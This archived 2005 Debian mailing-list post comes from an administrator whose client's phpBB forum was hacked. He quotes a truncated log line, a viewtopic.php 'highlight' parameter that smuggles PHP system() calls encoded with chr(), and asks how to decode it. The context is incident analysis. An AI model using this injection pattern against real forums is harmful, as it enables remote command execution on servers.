(OT) Understanding phpbb hack.

From: Franki (franki_at_htmlfixit.com)
Date: 01/25/05

Next message: ViCToRy: "Re: My boss want to kill debian, please help !"

Previous message: Olaf Conradi: "Re: jpegtran lossless rotation?"
Next in thread: Adam Porter: "Re: (OT) Understanding phpbb hack."
Reply: Adam Porter: "Re: (OT) Understanding phpbb hack."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Date: Tue, 25 Jan 2005 19:16:14 +0800
To: Debian-User <debian-user@lists.debian.org>

A client of mine was hacked using a phpbb exploit.

the command string in the log was a long involuted string like so:

viewtopic.php?t=509&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32
(about 20 more lines like this have been snipped)

Does anyone know of a perl script or something that can convert this
back to a string of human readable shell commands??

Rgds

Franki

-- 
To UNSUBSCRIBE, email to debian-user-REQUEST@lists.debian.org 
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Next message: ViCToRy: "Re: My boss want to kill debian, please help !"

Previous message: Olaf Conradi: "Re: jpegtran lossless rotation?"
Next in thread: Adam Porter: "Re: (OT) Understanding phpbb hack."
Reply: Adam Porter: "Re: (OT) Understanding phpbb hack."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Relevant Pages

Re: how to get a wav file track length
... String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long ... Dim sBuffer As String ... Dim sFileName As String ... used to separate parameters in the MCI command string. ...
(microsoft.public.vb.general.discussion)
Re: Herfried K. Wagner - HELP!
... Where did you find the command string ... Private Sub StartRecording() ... mciSimpleSendString("open new type waveaudio alias capture") ...
(microsoft.public.dotnet.languages.vb)
Re: how to get a wav file track length
... String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long ... Dim sBuffer As String ... Dim sFileName As String ... used to separate parameters in the MCI command string. ...
(microsoft.public.vb.general.discussion)
Re: A general question about SQL statement
... SQL Server caches commands and precompiles them. ... If the command string does ... into the command string, it will change virtually every time, defeating this ...
(microsoft.public.dotnet.languages.csharp)
Re: How to pass Excel cell value to VB app variable?
... single string variable that contains the command you want to ... pass to Shell and use that variable as the argument to Shell. ... build the command string and test print it or look at it in ... It work if you get the command string built correctly and it will ...
(microsoft.public.vb.general.discussion)